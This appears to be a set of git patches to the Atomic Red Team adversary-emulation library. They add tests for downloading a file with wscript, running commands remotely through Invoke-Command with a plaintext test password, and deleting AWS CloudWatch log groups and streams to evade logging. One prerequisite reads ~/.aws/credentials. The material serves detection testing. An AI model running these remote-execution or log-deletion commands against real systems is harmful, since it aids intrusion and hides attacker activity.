b/atomics/Indexes/Indexes-CSV/index.csv index 0f140af2..52083a51 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1253,6 +1253,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt +command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 9748317b..199d8831 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -909,6 +909,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt +command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 9c728cb9..06331add 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2095,6 +2095,7 @@ - Atomic Test #23: Lolbas replace.exe use to copy file [windows] - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows] - Atomic Test #25: certreq download [windows] + - Atomic Test #26: Download a file using wscript [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 79c3f983..f29c6a37 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1521,6 +1521,7 @@ - Atomic Test #23: Lolbas replace.exe use to copy file [windows] - Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows] - Atomic Test #25: certreq download [windows] + - Atomic Test #26: Download a file using wscript [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a944ce29..520c8a9e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -91410,6 +91410,21 @@ command-and-control: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt + - name: Download a file using wscript + auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 + description: Use wscript to run a local VisualBasic file to download a remote + file + supported_platforms: + - windows + input_arguments: + vbscript_file: + description: Full path to the VisualBasic downloading the file + type: String + default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs + executor: + command: 'wscript.exe #{vbscript_file}' + cleanup_command: del Atomic-License.txt >nul 2>&1 + name: command_prompt T1001.002: technique: x_mitre_platforms: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index ffac8680..74f3f203 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -58,6 +58,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co - [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download) +- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript) +
@@ -1132,4 +1134,41 @@ del #{local_path} >nul 2>&1 +
+
+ +## Atomic Test #26 - Download a file using wscript +Use wscript to run a local VisualBasic file to download a remote file + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vbscript_file | Full path to the VisualBasic downloading the file | String | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wscript.exe #{vbscript_file} +``` + +#### Cleanup Commands: +```cmd +del Atomic-License.txt >nul 2>&1 +``` + + + + +
From a6edd37f05ab9a3e0313fdea438612faf4101db4 Mon Sep 17 00:00:00 2001 From: tenillekay <54289116+tenillekay@users.noreply.github.com> Date: Mon, 1 Aug 2022 16:13:53 -0500 Subject: [PATCH 19/22] Update T1021.006.yaml (#2063) Updated Test #2 to make it more complete. --- atomics/T1021.006/T1021.006.yaml | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index d19b621d..0a47fb86 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml @@ -14,27 +14,34 @@ atomic_tests: Enable-PSRemoting -Force name: powershell elevation_required: true -- name: Invoke-Command +- name: Remote Code Execution with PS Credentials Using Invoke-Command auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 description: | Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. supported_platforms: - windows input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig + username: + description: The username running the powershell command + type: string + default: $env:USERNAME + remotehost: + description: The remote hostname of the machine you are running the powershell command on. + type: string + default: $env:COMPUTERNAME + password: + description: The password to be used with the user provided in the previous input argument. + type: string + default: test12345 executor: - command: | - invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} + command: |- + $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) + Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} name: powershell + - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled From 423d25021b37644cf722fd6e68d1cb78226acbce Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 21:14:26 +0000 Subject: [PATCH 20/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 33 +++++++++++-------- atomics/T1021.006/T1021.006.md | 15 +++++---- 6 files changed, 33 insertions(+), 23 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 52083a51..e3e0891f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -844,7 +844,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell -lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell +lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 199d8831..f024778f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -604,7 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell -lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell +lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 06331add..e155fc0a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1465,7 +1465,7 @@ - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md) - Atomic Test #1: Enable Windows Remote Management [windows] - - Atomic Test #2: Invoke-Command [windows] + - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows] - Atomic Test #3: WinRM Access with Evil-WinRM [windows] - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md) - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index f29c6a37..a2bcf3fa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1060,7 +1060,7 @@ - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md) - Atomic Test #1: Enable Windows Remote Management [windows] - - Atomic Test #2: Invoke-Command [windows] + - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows] - Atomic Test #3: WinRM Access with Evil-WinRM [windows] - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md) - Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 520c8a9e..7f161f78 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -67595,27 +67595,34 @@ lateral-movement: ' name: powershell elevation_required: true - - name: Invoke-Command + - name: Remote Code Execution with PS Credentials Using Invoke-Command auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 description: | Execute Invoke-command on remote host. - Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. supported_platforms: - windows input_arguments: - host_name: - description: Remote Windows Host Name - type: String - default: localhost - remote_command: - description: Command to execute on remote Host - type: String - default: ipconfig + username: + description: The username running the powershell command + type: string + default: "$env:USERNAME" + remotehost: + description: The remote hostname of the machine you are running the powershell + command on. + type: string + default: "$env:COMPUTERNAME" + password: + description: The password to be used with the user provided in the previous + input argument. + type: string + default: test12345 executor: - command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} - - ' + command: |- + $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) + Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index 5e070e13..2ec818bd 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -8,7 +8,7 @@ WinRM is the name of both a Windows service and a protocol that allows a user to - [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management) -- [Atomic Test #2 - Invoke-Command](#atomic-test-2---invoke-command) +- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command) - [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm) @@ -45,10 +45,10 @@ Enable-PSRemoting -Force

-## Atomic Test #2 - Invoke-Command +## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command Execute Invoke-command on remote host. -Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. +Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`. **Supported Platforms:** Windows @@ -62,15 +62,18 @@ Upon successful execution, powershell will execute ipconfig on localhost using ` #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| host_name | Remote Windows Host Name | String | localhost| -| remote_command | Command to execute on remote Host | String | ipconfig| +| username | The username running the powershell command | string | $env:USERNAME| +| remotehost | The remote hostname of the machine you are running the powershell command on. | string | $env:COMPUTERNAME| +| password | The password to be used with the user provided in the previous input argument. | string | test12345| #### Attack Commands: Run with `powershell`! ```powershell -invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}} +$SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword) +Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami} ``` From 93133c0fc5378dc9aaf700779efccaeafee6d586 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 1 Aug 2022 21:38:34 +0000 Subject: [PATCH 21/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/used_guids.txt | 2 ++ 1 file changed, 2 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 03b61cda..98748362 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1101,3 +1101,5 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 57ba4ce9-ee7a-4f27-9928-3c70c489b59d 97116a3f-efac-4b26-8336-b9cb18c45188 +89422c87-b57b-4a04-a8ca-802bb9d06121 +33ca84bc-4259-4943-bd36-4655dc420932 From 75d1f18790bf59d84639ba29c7b523022a6d2dab Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 21:38:41 +0000 Subject: [PATCH 22/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/linux-index.md | 2 + atomics/Indexes/index.yaml | 82 +++++++++++++ atomics/T1562.008/T1562.008.md | 109 ++++++++++++++++++ 6 files changed, 199 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e3e0891f..aa9702c5 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -359,6 +359,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh +defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh +defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d2f57b64..d2195c8f 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -77,6 +77,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2 defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh +defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh +defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index e155fc0a..c5e4ac8c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -527,6 +527,8 @@ - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365] - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos] + - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws] + - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws] - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md) - Atomic Test #1: Hidden Window [windows] - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 062a8e2b..6da30745 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -162,6 +162,8 @@ - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365] - Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos] + - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws] + - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws] - T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7f161f78..122b1e3f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -21526,6 +21526,88 @@ defense-evasion: ./stratus cleanup --all name: sh elevation_required: false + - name: AWS CloudWatch Log Group Deletes + auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 + description: "Creates a new cloudWatch log group in AWS, Upon successful creation + it will Delete the group. Attackers can use this technique to evade defenses + by \ndeleting the log stream. Once it is deleted, the logs created by the + attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n" + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: log-test + region: + description: Name of the region + type: String + default: us-east-1 + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + + ' + prereq_command: 'cat ~/.aws/credentials | grep "default" + + ' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + + ' + executor: + command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: + name: sh + elevation_required: false + - name: AWS CloudWatch Log Stream Deletes + auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932 + description: "Creates a new cloudWatch log stream in AWS, Upon successful creation + it will Delete the stream. Attackers can use this technique to evade defenses + by \ndeleting the log stream. Once it is deleted, the logs created by the + attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n" + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: test-logs + cloudwatch_log_stream_name: + description: Name of the cloudWatch log stream + type: String + default: '20150601' + region: + description: Name of the region + type: String + default: us-west-2 + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + + ' + prereq_command: 'cat ~/.aws/credentials | grep "default" + + ' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + + ' + executor: + command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" + cleanup_command: + name: sh + elevation_required: false T1564.003: technique: x_mitre_platforms: diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md index 869b1c83..425b5059 100644 --- a/atomics/T1562.008/T1562.008.md +++ b/atomics/T1562.008/T1562.008.md @@ -14,6 +14,10 @@ Cloud environments allow for collection and analysis of audit and application lo - [Atomic Test #4 - Disable CloudTrail Logging Through Event Selectors via Stratus](#atomic-test-4---disable-cloudtrail-logging-through-event-selectors-via-stratus) +- [Atomic Test #5 - AWS CloudWatch Log Group Deletes](#atomic-test-5---aws-cloudwatch-log-group-deletes) + +- [Atomic Test #6 - AWS CloudWatch Log Stream Deletes](#atomic-test-6---aws-cloudwatch-log-stream-deletes) +
@@ -261,4 +265,109 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws +
+
+ +## Atomic Test #5 - AWS CloudWatch Log Group Deletes +Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by +deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 89422c87-b57b-4a04-a8ca-802bb9d06121 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| cloudwatch_log_group_name | Name of the cloudWatch log group | String | log-test| +| region | Name of the region | String | us-east-1| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Created ***" +aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Deleted ***" +``` + + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + + +
+
+ +## Atomic Test #6 - AWS CloudWatch Log Stream Deletes +Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by +deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 33ca84bc-4259-4943-bd36-4655dc420932 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| cloudwatch_log_group_name | Name of the cloudWatch log group | String | test-logs| +| cloudwatch_log_stream_name | Name of the cloudWatch log stream | String | 20150601| +| region | Name of the region | String | us-west-2| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Created ***" +aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} +echo "*** Log Stream Created ***" +aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} +echo "*** Log Stream Deleted ***" +aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json +echo "*** Log Group Deleted ***" +``` + + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + +